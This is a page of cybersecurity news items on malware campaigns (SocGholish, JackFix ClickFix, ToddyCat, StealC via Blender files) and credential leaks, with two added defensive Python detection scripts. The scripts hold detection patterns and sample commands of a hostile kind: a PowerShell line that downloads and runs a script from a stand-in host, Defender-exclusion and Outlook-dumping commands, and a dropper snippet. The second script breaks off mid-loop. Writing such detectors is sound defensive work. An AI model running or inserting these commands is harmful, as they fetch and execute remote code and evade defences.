Category: Cybersecurity

  • RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware

    Nov 26, 2025 | Ravie Lakshmanan | Malware / Cyber Espionage

    The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent.

    “This is the first time that a RomCom payload has been observed being distributed by SocGholish,” Arctic Wolf Labs researcher Jacob Faires said in a Tuesday report.

    The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia’s Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. According to the cybersecurity company, the targeted entity had worked for a city with close ties to Ukraine in the past.

    SocGholish (aka FakeUpdates), linked to a financially motivated operator tracked as TA569 (aka Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543), serves as an initial access broker, allowing other threat actors to drop a wide range of payloads. Some of its known customers are Evil Corp, LockBit, Dridex, and Raspberry Robin.

    The attack chains typically involve serving fake browser update alerts for Google Chrome or Mozilla Firefox on legitimate-but-compromised websites to trick unsuspecting users into downloading malicious JavaScript that’s responsible for installing a loader, which then fetches additional malware.

    For the most part, the attacks single out websites that are poorly secured, taking advantage of known security vulnerabilities in plugins to inject JavaScript code that’s designed to display the pop-up and activate the infection chain.

    RomCom (aka Nebulous Mantis, Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), on the other hand, is the name assigned to a Russia-aligned threat actor that’s known to dabble in both cybercrime and espionage operations since at least 2022.

    The threat actor leverages several methods, including spear-phishing and zero-day exploits, to breach target networks and drop the eponymous remote access trojan (RAT) on victim machines. Attacks mounted by the hacking group have singled out entities in Ukraine, as well as NATO-related defense organizations.

    In the attack analyzed by Arctic Wolf, the fake update payload allows the threat actors to run commands on the compromised machine by means of a reverse shell established to a command-and-control (C2) server. This includes conducting reconnaissance and dropping a custom Python backdoor codenamed VIPERTUNNEL.

    Also delivered is a RomCom-linked DLL loader that launches the Mythic Agent, a crucial component of the cross-platform, post-exploitation red teaming framework Mythic; the agent communicates with a corresponding server to support command execution, file operations, and other tasks.

    While the attack was ultimately unsuccessful and was blocked before it could progress any further, the development shows the RomCom threat actor’s continued interest in targeting Ukraine or entities providing assistance to the country, no matter how tenuous the connection may be.

    “The timeline from infection via [the fake update] to the delivery of RomCom’s loader was less than 30 minutes,” Jacob Faires said. “Delivery is not made until the target’s Active Directory domain has been verified to match a known value provided by the threat actor.”

    “The widespread nature of SocGholish attacks and the relative speed at which the attack progresses from initial access to infection makes it a potent threat to organizations worldwide.”


    Source: thehackernews.com…

  • FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams

    The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to facilitate account takeover (ATO) fraud schemes.

    The activity targets individuals, businesses, and organizations of varied sizes and across sectors, the agency said, adding the fraudulent schemes have led to more than $262 million in losses since the start of the year. The FBI said it has received over 5,100 complaints.

    ATO fraud typically refers to attacks that enable threat actors to obtain unauthorized access to an online financial institution, payroll system, or health savings account to siphon data and funds for personal gain. The access is often obtained by approaching targets through social engineering techniques, such as texts, calls, and emails that prey on users’ fears, or via bogus websites.

    These methods make it possible for attackers to deceive users into providing their login credentials on a phishing site, in some instances, urging them to click on a link to report purported fraudulent transactions recorded against their accounts.

    “A cybercriminal manipulates the account owner into giving away their login credentials, including multi-factor authentication (MFA) code or One-Time Passcode (OTP), by impersonating a financial institution employee, customer support, or technical support personnel,” the FBI said.

    “The cybercriminal then uses login credentials to log into the legitimate financial institution website and initiate a password reset, ultimately gaining full control of the accounts.”

    Other cases involve threat actors masquerading as financial institutions contacting account owners, claiming their information was used to make fraudulent purchases, including firearms, and then convincing them to provide their account information to a second cybercriminal impersonating law enforcement.

    The FBI said ATO fraud can also involve the use of Search Engine Optimization (SEO) poisoning to trick users looking for businesses on search engines into clicking on phony links that redirect to a lookalike site by means of malicious search engine ads.

    Regardless of the method used, the attacks have one aim: to seize control of the accounts, swiftly wire funds to other accounts under the attackers’ control, and change the passwords, effectively locking out the account owner. The accounts to which the money is transferred are in turn linked to cryptocurrency wallets to convert the funds into digital assets and obscure the money trail.

    To stay protected against the threat, users are advised to be careful when sharing information about themselves online or on social media, regularly monitor accounts for financial irregularities, use unique, complex passwords, verify the URL of a banking website before signing in, and stay vigilant against phishing attacks and suspicious callers.

    “By openly sharing information like a pet’s name, schools you have attended, your date of birth, or information about your family members, you may give scammers the information they need to guess your password or answer your security questions,” the FBI said.

    “The large majority of ATO accounts referenced in the FBI announcement occur through compromised credentials used by threat actors intimately familiar with the internal processes and workflows for money movement within financial institutions,” Jim Routh, chief trust officer at Saviynt, said in a statement.

    “The most effective controls to prevent these attacks are manual (phone calls for verification) and SMS messages for approval. The root cause continues to be the accepted use of credentials for cloud accounts despite having passwordless options available.”

    The development comes as Darktrace, Flashpoint, Forcepoint, Fortinet, and Zimperium have highlighted the major cybersecurity threats ahead of the holiday season, including Black Friday scams, QR code fraud, gift card draining, and high-volume phishing campaigns that mimic popular brands like Amazon and Temu.

    Many of these activities leverage artificial intelligence (AI) tools to produce highly persuasive phishing emails, fake websites, and social media ads, allowing even low-skill attackers to pull off attacks that appear trustworthy and increase the success rate of their campaigns.

    Fortinet FortiGuard Labs said it detected at least 750 malicious, holiday-themed domains registered over the last three months, with many using key terms like “Christmas,” “Black Friday,” and “Flash Sale.” “Over the last three months, more than 1.57 million login accounts tied to major e-commerce sites, available through stealer logs, were collected across underground markets,” the company said.

    Attackers have also been found actively exploiting security vulnerabilities across Adobe/Magento, Oracle E-Business Suite, WooCommerce, Bagisto, and other common e-commerce platforms. Some of the exploited vulnerabilities include CVE-2025-54236, CVE-2025-61882, and CVE-2025-47569.

    According to Zimperium zLabs, there has been a 4x increase in mobile phishing (aka mishing) sites, with attackers leveraging trusted brand names to create urgency and deceive users into clicking, logging in, or downloading malicious updates.

    What’s more, Recorded Future has called attention to purchase scams where threat actors use fake e-commerce stores to steal victim data and authorize fraudulent payments for non-existent goods and services. It described the scams as a “major emerging fraud threat.”

    “A sophisticated dark web ecosystem allows threat actors to quickly establish new purchase scam infrastructure and amplify their impact,” the company said. “Promotional activities mirroring traditional marketing – including an offer to sell stolen card data on the dark web carding shop PP24 – are widespread in this underground.”

    “Threat actors fund ad campaigns with stolen payment cards to spread purchase scams, which in turn compromise more payment card data, fueling a continuing cycle of fraud.”


    Source: thehackernews.com…

  • Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys

    Nov 25, 2025 | Ravie Lakshmanan | Data Exposure / Cloud Security

    New research has found that organizations in various sensitive sectors, including governments, telecoms, and critical infrastructure, are pasting passwords and credentials into online tools like JSONformatter and CodeBeautify that are used to format and validate code.

    Cybersecurity company watchTowr Labs said it captured a dataset of over 80,000 files on these sites, uncovering thousands of usernames, passwords, repository authentication keys, Active Directory credentials, database credentials, FTP credentials, cloud environment keys, LDAP configuration information, helpdesk API keys, meeting room API keys, SSH session recordings, and all kinds of personal information.

    This includes five years of historical JSONFormatter content and one year of historical CodeBeautify content, totalling over 5GB worth of enriched, annotated JSON data.

    Organizations impacted by the leak span critical national infrastructure, government, finance, insurance, banking, technology, retail, aerospace, telecommunications, healthcare, education, travel, and, ironically, cybersecurity sectors.

    “These tools are extremely popular, often appearing near the top of search results for terms like ‘JSON beautify’ and ‘best place to paste secrets’ (probably, unproven) — and used by a wide variety of organizations, organisms, developers, and administrators in both enterprise environments and for personal projects,” security researcher Jake Knott said in a report shared with The Hacker News.

    Both tools also offer the ability to save a formatted JSON structure or code, turning it into a semi-permanent, shareable link with others – effectively allowing anyone with access to the URL to access the data.

    As it happens, the sites not only provide a handy Recent Links page to list all recently saved links, but also follow a predictable URL format for the shareable link, thereby making it easier for a bad actor to retrieve all URLs using a simple crawler –

    • https://jsonformatter.org/{id-here}
    • https://jsonformatter.org/{formatter-type}/{id-here}
    • https://codebeautify.org/{formatter-type}/{id-here}

    Some examples of leaked information include Jenkins secrets, a cybersecurity company exposing encrypted credentials for sensitive configuration files, Know Your Customer (KYC) information associated with a bank, a major financial exchange’s AWS credentials linked to Splunk, and Active Directory credentials for a bank.

    To make matters worse, the company said it uploaded fake AWS access keys to one of these tools and found bad actors attempting to abuse them 48 hours after they were saved. This indicates that valuable information exposed through these sources is being scraped and tested by other parties, posing severe risks.

    “Mostly because someone is already exploiting it, and this is all really, really stupid,” Knott said. “We don’t need more AI-driven agentic agent platforms; we need fewer critical organizations pasting credentials into random websites.”

    When checked by The Hacker News, both JSONFormatter and CodeBeautify have temporarily disabled the save functionality, claiming they are “working on to make it better” and implementing “enhanced NSFW (Not Safe For Work) content prevention measures.”

    watchTowr said that the save functionality was disabled by these sites likely in response to the research. “We suspect this change occurred in September in response to communication from a number of the affected organizations we alerted,” it added.


    Source: thehackernews.com…

  • JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

    Cybersecurity researchers are calling attention to a new campaign that’s leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a “critical” Windows security update.

    “Campaign leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising,” Acronis said in a new report shared with The Hacker News. “The adult theme, and possible connection to shady websites, adds to the victim’s psychological pressure to comply with sudden ‘security update’ installation.”

    ClickFix-style attacks have surged over the past year, typically tricking users into running malicious commands on their own machines using prompts for technical fixes or completing CAPTCHA verification checks. According to data from Microsoft, ClickFix has become the most common initial access method, accounting for 47% of attacks.

    The latest campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code, indicating that attackers are moving away from the traditional robot-check lures. The activity has been codenamed JackFix by the Singapore-based cybersecurity company.

    Perhaps the most concerning aspect of the attack is that the phony Windows update alert hijacks the entire screen and instructs the victim to open the Windows Run dialog, press Ctrl + V, and hit Enter, thereby triggering the infection sequence.

    It’s assessed that the starting point of the attack is a fake adult site to which unsuspecting users are redirected via malvertising or other social engineering methods, only to suddenly serve them an “urgent security update.” Select iterations of the sites have been found to include developer comments in Russian, hinting at the possibility of a Russian-speaking threat actor.

    “The Windows Update screen is created entirely using HTML and JavaScript code, and pops up as soon as the victim interacts with any element on the phishing site,” security researcher Eliad Kimhy said. “The page attempts to go full screen via JavaScript code, while at the same time creating a fairly convincing Windows Update window composed of a blue background and white text, reminiscent of Windows’ infamous blue screen of death.”

    What’s notable about the attack is that it heavily leans on obfuscation to conceal ClickFix-related code, as well as blocks users from escaping the full-screen alert by disabling the Escape and F11 buttons, along with F5 and F12 keys. However, due to faulty logic, users can still press the Escape and F11 buttons to get rid of the full screen.

    The initial command executed is an MSHTA payload launched using the legitimate mshta.exe binary, which in turn contains JavaScript designed to run a PowerShell command that retrieves another PowerShell script from a remote server. The domains hosting that script are set up so that directly navigating to them in a browser redirects the user to a benign site like Google or Steam.

    “Only when the site is reached out to via an irm or iwr PowerShell command does it respond with the correct code,” Acronis explained. “This creates an extra layer of obfuscation and analysis prevention.”

    The downloaded PowerShell script also packs in various obfuscation and anti-analysis mechanisms, one of which is the use of garbage code to complicate analysis efforts. It also attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged.

    To achieve privilege escalation, the malware uses the Start-Process cmdlet in conjunction with the “-Verb RunAs” parameter to launch PowerShell with administrative rights and continuously prompts for permission until it’s granted by the victim. Once this step is successful, the script is designed to drop additional payloads, such as simple remote access trojans (RATs) that are programmed to contact a C2 server, presumably to drop more malware.

    The PowerShell script has also been observed to serve up to eight different payloads, with Acronis describing it as the “most egregious example of spray and pray.” These include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, as well as other unspecified loaders and RATs.

    “If only one of these payloads manages to run successfully, victims risk losing passwords, crypto wallets, and more,” Kimhy said. “In the case of a few of these loaders — the attacker may choose to bring in other payloads into the attack, and the attack can quickly escalate further.”

    The disclosure comes as Huntress detailed a multi-stage malware execution chain that originates from a ClickFix lure masquerading as a Windows update and deploys stealer malware like Lumma and Rhadamanthys by concealing the final stages within an image, a technique known as steganography.

    Like in the case of the aforementioned campaign, the ClickFix command copied to the clipboard and pasted into the Run dialog uses mshta.exe to run a JavaScript payload that’s capable of running a remotely-hosted PowerShell script directly in memory.

    The PowerShell code is used to decrypt and launch a .NET assembly payload, a loader dubbed Stego Loader that serves as a conduit for the execution of Donut-packed shellcode hidden within an embedded and encrypted PNG file. The extracted shellcode is then injected into a target process to ultimately deploy Lumma or Rhadamanthys.

    Interestingly, one of the domains listed by Huntress as being used to fetch the PowerShell script (“securitysettings[.]live”) has also been flagged by Acronis, suggesting these two activity clusters may be related.

    “The threat actor often changes the URI (/tick.odd, /gpsc.dat, /ercx.dat, etc.) used to host the first mshta.exe stage,” security researchers Ben Folland and Anna Pham said in the report.

    “Additionally, the threat actor moved from hosting the second stage on the domain securitysettings[.]live and instead hosted on xoiiasdpsdoasdpojas[.]com, although both point to the same IP address 141.98.80[.]175, which was also used to deliver the first stage [i.e., the JavaScript code run by mshta.exe].”

    ClickFix has become hugely successful as it relies on a simple yet effective method, which is to entice a user into infecting their own machine and bypassing security controls. Organizations can defend against such attacks by training employees to better spot the threat and disabling the Windows Run box via Registry changes or Group Policy.


    Source: thehackernews.com…

  • ToddyCat’s New Hacking Tools Steal Outlook Emails and Microsoft 365 Access Tokens

    Nov 25, 2025 | Ravie Lakshmanan | Malware / Vulnerability

    The threat actor known as ToddyCat has been observed adopting new methods to obtain access to corporate email data belonging to target companies, including using a custom tool dubbed TCSectorCopy.

    “This attack allows them to obtain tokens for the OAuth 2.0 authorization protocol using the user’s browser, which can be used outside the perimeter of the compromised infrastructure to access corporate mail,” Kaspersky said in a technical breakdown.

    ToddyCat, assessed to be active since 2020, has a track record of targeting various organizations in Europe and Asia with tools such as Samurai and TomBerBil to retain access and steal cookies and credentials from web browsers like Google Chrome and Microsoft Edge.

    Earlier this April, the hacking group was attributed to the exploitation of a security flaw in ESET Command Line Scanner (CVE-2024-11859, CVSS score: 6.8) to deliver a previously undocumented malware codenamed TCESB.

    Kaspersky said it detected a PowerShell variant of TomBerBil (as opposed to C++ and C# versions flagged before) in attacks that took place between May and June 2024, which comes with capabilities to extract data from Mozilla Firefox. A notable feature of this version is that it runs on domain controllers from a privileged user and can access browser files via shared network resources using the SMB protocol.

    The malware, the company added, was launched by means of a scheduled task that executed a PowerShell command. Specifically, it searches for browser history, cookies, and saved credentials in the remote host over SMB. While the copied files containing the information are encrypted using the Windows Data Protection API (DPAPI), TomBerBil is equipped to capture the encryption key necessary to decrypt the data.

    “The previous version of TomBerBil ran on the host and copied the user token. As a result, DPAPI was used to decrypt the master key in the user’s current session, and subsequently the files themselves,” researchers said. “In the newer server version, TomBerBil copies files containing user encryption keys that are used by DPAPI. Using these keys, as well as the user’s SID and password, attackers can decrypt all copied files locally.”

    The threat actors have also been found to access corporate emails stored in local Microsoft Outlook storage in the form of OST (short for Offline Storage Table) files using TCSectorCopy (“xCopy.exe”), bypassing restrictions that limit access to such files when the application is running.

    Written in C++, TCSectorCopy accepts as input a file to be copied (in this case, OST files) and then proceeds to open the disk as a read-only device and sequentially copy the file contents sector by sector. Once the OST files are written to a path of the attacker’s choosing, the contents of the electronic correspondence are extracted using XstReader, an open-source viewer for Outlook OST and PST files.

    Another tactic adopted by ToddyCat involves efforts to obtain access tokens directly from memory in cases where victim organizations used the Microsoft 365 cloud service. The JSON web tokens (JWTs) are obtained through an open-source C# tool named SharpTokenFinder, which enumerates Microsoft 365 applications for plain text authentication tokens.

    But the threat actor is said to have faced a setback in at least one investigated incident after security software installed on the system blocked SharpTokenFinder’s attempt to dump the Outlook.exe process. To get around this restriction, the operator used the ProcDump tool from the Sysinternals package with specific arguments to take a memory dump of the Outlook process.
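    The process chains in this item and in the JackFix item above (mshta.exe pulling a remote payload, PowerShell fetching a second stage with irm/iwr and running it in memory, a script adding Microsoft Defender exclusions, and ProcDump being pointed at Outlook.exe) all leave a trail in process-creation telemetry. The Python below is an added example, not code from the Acronis, Huntress or Kaspersky reports: it runs four such rules over a batch of constructed Sysmon-style events. The field names, the hypothetical hosts and paths, the reserved-TLD domain update.example and the ProcDump arguments are assumptions; the /tick.odd URI is one of those Huntress lists.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style field names; assumed schema)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


def exe_name(path: str) -> str:
    """Lower-cased file name of an image path ('C:\\Windows\\System32\\mshta.exe' -> 'mshta.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


_URL_RE = re.compile(r"https?://", re.I)
_FETCH_RE = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)
_EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
_EXCLUSION_RE = re.compile(r"add-mppreference\b.*-exclusion", re.I)
_POWERSHELL = ("powershell.exe", "pwsh.exe")


def mshta_remote_payload(ev: ProcEvent, parent: ProcEvent | None) -> bool:
    """mshta.exe given a URL argument: the first stage both ClickFix write-ups describe."""
    return exe_name(ev.image) == "mshta.exe" and bool(_URL_RE.search(ev.cmdline))


def powershell_fetch_from_mshta(ev: ProcEvent, parent: ProcEvent | None) -> bool:
    """PowerShell spawned by mshta.exe that downloads (irm/iwr) and runs (iex) a remote script."""
    if exe_name(ev.image) not in _POWERSHELL or parent is None or exe_name(parent.image) != "mshta.exe":
        return False
    return bool(_FETCH_RE.search(ev.cmdline)) and bool(_EXEC_RE.search(ev.cmdline))


def defender_exclusion_added(ev: ProcEvent, parent: ProcEvent | None) -> bool:
    """Add-MpPreference -Exclusion* issued from PowerShell (the JackFix script's defence-evasion step)."""
    return exe_name(ev.image) in _POWERSHELL and bool(_EXCLUSION_RE.search(ev.cmdline))


def procdump_of_outlook(ev: ProcEvent, parent: ProcEvent | None) -> bool:
    """Sysinternals ProcDump aimed at outlook.exe (the ToddyCat fallback for harvesting M365 tokens)."""
    return exe_name(ev.image).startswith("procdump") and "outlook" in ev.cmdline.lower()


RULES = {
    "mshta_remote_payload": mshta_remote_payload,
    "powershell_fetch_from_mshta": powershell_fetch_from_mshta,
    "defender_exclusion_added": defender_exclusion_added,
    "procdump_of_outlook": procdump_of_outlook,
}


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Return {pid: [rule names that fired]} for every event that matched at least one rule.

    Parent lookups are resolved within the batch by ppid, which is how the
    mshta.exe -> powershell.exe relationship is established."""
    by_pid = {ev.pid: ev for ev in events}
    hits: dict[int, list[str]] = {}
    for ev in events:
        parent = by_pid.get(ev.ppid)
        fired = [name for name, rule in RULES.items() if rule(ev, parent)]
        if fired:
            hits[ev.pid] = fired
    return hits


# Constructed sample telemetry (hypothetical hosts and paths; update.example is a reserved domain).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe", "mshta.exe http://update.example/tick.odd"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (irm http://update.example/stage2)"'),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Add-MpPreference -ExclusionPath C:\\Users\\Public"'),
    ProcEvent(500, 600, r"C:\Tools\procdump64.exe", "procdump64.exe -ma outlook.exe C:\\Temp\\o.dmp"),
    # Benign activity that must not fire: a local .hta file and an interactive PowerShell command.
    ProcEvent(700, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Program Files\Vendor\setup.hta"),
    ProcEvent(800, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -c Get-Process"),
]

if __name__ == "__main__":
    for pid, fired in triage(SAMPLE_EVENTS).items():
        print(pid, fired)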

    “The ToddyCat APT group is constantly developing its techniques and looking for those that would hide activity to gain access to corporate correspondence within the compromised infrastructure,” Kaspersky said.


    Source: thehackernews.com…

  • 3 SOC Challenges You Need to Solve Before 2026

    2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns.

    The Storm on the Horizon

    Global instability, coupled with rapid technological advancement, will force security teams to adapt not just their defensive technologies but their entire workforce approach. The average SOC already processes about 11,000 alerts daily, but the volume and sophistication of threats are accelerating. For business leaders, this translates to direct impacts on operational continuity, regulatory compliance, and bottom-line financials.

    SOCs that can’t keep pace won’t just struggle; they’ll fail spectacularly. Solve these three core issues now, or pay dearly later.

    1. Evasive Threats Are Slipping Through—And Getting Smarter Fast

    Attackers have mastered evasion. ClickFix campaigns trick employees into pasting malicious PowerShell commands by themselves. LOLBins are abused to hide malicious behavior. Multi-stage phishing hides behind QR codes, CAPTCHAs, rewritten URLs, and fake installers. Traditional sandboxes stall because they can’t click “Next,” solve challenges, or follow human-dependent flows. Result? Low detection rates for the exact threats exploding in 2025 and beyond.

    Fix it with interactive malware analysis

    ANY.RUN’s Interactive Sandbox with Automated Interactivity uses machine learning to automatically interact with malware samples, bypassing CAPTCHAs on phishing sites and completing necessary actions to force malware execution. The platform doesn’t just observe, it actively engages with threats the way a human analyst would, but at machine speed.

    ANY.RUN’s Sandbox processes a link from a QR code

    Through Smart Content Analysis, the sandbox automatically identifies and detonates key components at each stage of the attack chain. It extracts URLs from QR codes, removes security rewrites from modified links, bypasses multi-stage redirects, processes email attachments, and executes payloads hidden within archives.

    Sandbox automatically running a PowerShell command in a ClickFix attack

    The business impact is immediate. By revealing the full attack chain in real time, ANY.RUN enables SOC teams to uncover entire attack sequences, retrieve IOCs, and refine detection rules within seconds rather than hours.

    2. Alert Avalanches Are Burning Out Your Tier 1 Team

    Thousands of daily alerts, mostly false positives. An average SOC handles 11,000 alerts daily, with only 19% worth investigating, according to the 2024 SANS SOC Survey. Tier 1 analysts drown in noise, escalating everything because they lack context. Every alert becomes a research project. Every investigation starts from zero. Burnout hits hard.

    Turnover doubles, morale tanks, and real threats hide in the backlog. By 2026, AI-orchestrated attacks will flood systems even faster, turning alert fatigue into a full-blown crisis.

    Clear the chaos with actionable threat intelligence

    ANY.RUN’s Threat Intelligence Lookup and TI Feeds transform alert triage by delivering 24× more IOCs per incident from 15,000+ SOC environments conducting real-world investigations, providing instant, deep context on emerging threats so analysts can confirm and contain attacks in seconds.

    Instead of starting every investigation from scratch, analysts query a single artifact and instantly receive complete intelligence: indicator verdict, geotargeting and urgency, associated campaigns, targeting patterns, related indicators, and MITRE ATT&CK mappings.

    Suspicious domain verdict: freshly spotted, belongs to Lumma stealer

    The sandbox integration is particularly helpful for junior analysts who may lack the skills and experience required for advanced malware analysis.

    3. Proving ROI: Making the Business Case for Cyber Defense

    From a financial leadership perspective, security spending often feels like a black hole: money is spent, but risk reduction is hard to quantify. SOCs are challenged to justify investments, especially when security teams seem to be a cost center without clear profit or business-driving impact.

    ANY.RUN shows that threat intelligence can actually save money and deliver business value. Here’s how:

    • Preventing Breaches: Threat Intelligence Feeds provide real-time IOCs collected from live sandbox investigations across 15,000+ organizations, helping prevent attacks before they hit.
    • Reducing False Positives: By filtering out low-risk alerts and surfacing only high-confidence malicious indicators, SOC teams spend less time chasing noise.
    • Automating Triage: Enrich alerts with contextual intelligence automatically (via API/SDK), reducing Tier 1 workload, lowering overtime and turnover costs.
    • Faster Response: TI Lookup links each IOC to a sandbox report, giving complete visibility into how malware behaves — enabling faster, more effective containment.
    • Continuous Updating: TI Feeds are continuously refreshed with unique, verified IOCs, helping your SOC stay ahead of emerging threats without manual research.

    Why this matters for 2026: In an era where cyber risk can directly impact financial performance, being able to demonstrate that security investments reduce risk, save resources, and improve operational efficiency is essential. Modern threat intelligence from ANY.RUN turns the SOC from a cost center into a value-generating asset.

    Take Control Before 2026 Hits

    AI is rewriting the rules of cyber defense. Evasive threats, alert overload, and budget scrutiny aren’t future problems, they’re today’s warnings. Tackle them with interactive analysis and real-time intelligence that actually works. Future-proof your SOC, keep your team sane, and turn security into a business asset.

    This article is a contributed piece from one of our valued partners.


    Source: thehackernews.com…

  • Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware

    Nov 25, 2025 | Ravie Lakshmanan | Malware / Browser Security

    Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2.

    “This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader,” Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News.

    “Users unknowingly download these 3D model files, which are designed to execute embedded Python scripts upon opening in Blender — a free, open-source 3D creation suite.”

    The cybersecurity company said the activity shares similarities with a prior campaign linked to Russian-speaking threat actors that involved impersonating the Electronic Frontier Foundation (EFF) to target the online gaming community and infect them with StealC and Pyramid C2.

    This assessment is based on tactical similarities in both campaigns, including using decoy documents, evasive techniques, and background execution of malware.

    The latest set of attacks abuses Blender's ability to embed Python scripts in .blend files (for example, the UI script that ships with a character rig). When the Auto Run option is enabled, those scripts execute automatically the moment the file is opened. This is dangerous because it amounts to arbitrary Python execution on the user's machine, with whatever privileges Blender has.

    The security risk has been acknowledged by Blender in its own documentation, which states: “The ability to include Python scripts within blend-files is valuable for advanced tasks such as rigging and automation. However, it poses a security risk since Python does not restrict what a script can do.”

    The attack chain essentially involves uploading to free 3D asset sites such as CGTrader malicious .blend files that carry an embedded script named "Rig_Ui.py". The script runs as soon as the file is opened in Blender with Auto Run enabled, and in turn fetches a PowerShell script that downloads two ZIP archives.

    While one of the ZIP files contains a payload for StealC V2, the second archive deploys a secondary Python-based stealer on the compromised host. The updated version of StealC, first announced in late April 2025, supports a wide range of information gathering features, allowing data to be extracted from 23 browsers, 100 web plugins and extensions, 15 cryptocurrency wallet apps, messaging services, VPNs, and email clients.

    “Keep Auto Run disabled unless the file source is trusted,” Morphisec said. “Attackers exploit Blender, which typically runs on physical machines with GPUs, bypassing sandboxes and virtual environments.”
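    As an added example (not Morphisec's code and not part of Blender), the following Python script triages a downloaded .blend file without ever launching Blender: it walks the file-block headers, counts embedded Text datablocks (ID code "TX", which is where a rig's "Rig_Ui.py" would live) and greps every block body for dropper-style tokens, since the script source itself is stored in the DATA blocks that follow the TX header. It assumes the classic .blend layout used through Blender 4.x (a 12-byte "BLENDER" header, then block headers of code, size, old address, SDNA index and count); gzip-compressed files from older versions are decompressed in place, zstd-compressed files are reported so they can be decompressed first. The token list and the `build_sample_blend` helper are constructed for this example.

```python
import gzip
import struct
import sys
from dataclasses import dataclass, field

MAGIC = b"BLENDER"
GZIP_MAGIC = b"\x1f\x8b"
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"

# Tokens that are unusual in a rig's UI script and common in droppers.
# Constructed list for this example; tune it for your own environment.
SUSPICIOUS_TOKENS = (
    b"import subprocess", b"subprocess.", b"os.system", b"os.popen",
    b"powershell", b"cmd.exe", b"urllib.request", b"base64.b64decode",
    b"exec(", b"eval(", b"ctypes",
)


@dataclass
class BlendReport:
    version: str              # three-digit Blender version from the header, e.g. "402"
    pointer_size: int         # 4 or 8, from the header
    text_blocks: int          # number of embedded Text datablocks (block code "TX")
    hits: list = field(default_factory=list)   # (file offset, block code, token)

    @property
    def needs_review(self) -> bool:
        # Any embedded script deserves a look before Auto Run is allowed to run it.
        return self.text_blocks > 0 or bool(self.hits)


def scan_blend(data: bytes) -> BlendReport:
    """Walk the file-block headers of a .blend and report embedded text and suspicious tokens."""
    if data.startswith(GZIP_MAGIC):               # Blender <= 2.9x "Compress File" option
        data = gzip.decompress(data)
    elif data.startswith(ZSTD_MAGIC):             # Blender >= 3.0 compresses with zstd
        raise ValueError("zstd-compressed .blend: decompress it first (zstd -d)")
    if len(data) < 12 or not data.startswith(MAGIC):
        raise ValueError("not a .blend file")

    # Header: "BLENDER", pointer-size char ('-' = 8 bytes, '_' = 4), endianness
    # ('v' = little, 'V' = big), then a 3-digit version such as "402".
    ptr_size = 8 if data[7:8] == b"-" else 4
    endian = "<" if data[8:9] == b"v" else ">"
    version = data[9:12].decode("ascii", errors="replace")
    # Block header: 4-byte code, int32 size, old memory address (ptr_size bytes),
    # int32 SDNA struct index, int32 count.  The body of `size` bytes follows.
    bhead = struct.Struct(f"{endian}4si{'Q' if ptr_size == 8 else 'I'}ii")

    text_blocks, hits, off = 0, [], 12
    while off + bhead.size <= len(data):
        code, size, _addr, _sdna, _count = bhead.unpack_from(data, off)
        if code == b"ENDB":                       # terminator block
            break
        body = data[off + bhead.size: off + bhead.size + size]
        if code == b"TX\x00\x00":                 # ID code of a Text datablock (embedded script)
            text_blocks += 1
        for token in SUSPICIOUS_TOKENS:
            if token in body:
                hits.append((off, code.rstrip(b"\x00").decode("ascii", "replace"), token.decode()))
        off += bhead.size + size
    return BlendReport(version, ptr_size, text_blocks, hits)


def build_sample_blend(script_text: bytes) -> bytes:
    """Constructed minimal file for testing: header, one TX block, one DATA block holding the script, ENDB."""
    bhead = struct.Struct("<4siQii")
    block = lambda code, body: bhead.pack(code, len(body), 0, 0, 1) + body
    return (b"BLENDER-v402" + block(b"TX\x00\x00", b"\x00" * 64)
            + block(b"DATA", script_text) + block(b"ENDB", b""))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        report = scan_blend(open(sys.argv[1], "rb").read())
    else:   # no path given: scan a constructed sample that mimics a PowerShell dropper
        report = scan_blend(build_sample_blend(
            b"import subprocess\nsubprocess.Popen(['powershell', '-w', 'hidden', '-c', '...'])\n"))
    print(f"Blender {report.version}: {report.text_blocks} text block(s), {len(report.hits)} suspicious hit(s)")
    for off, code, token in report.hits:
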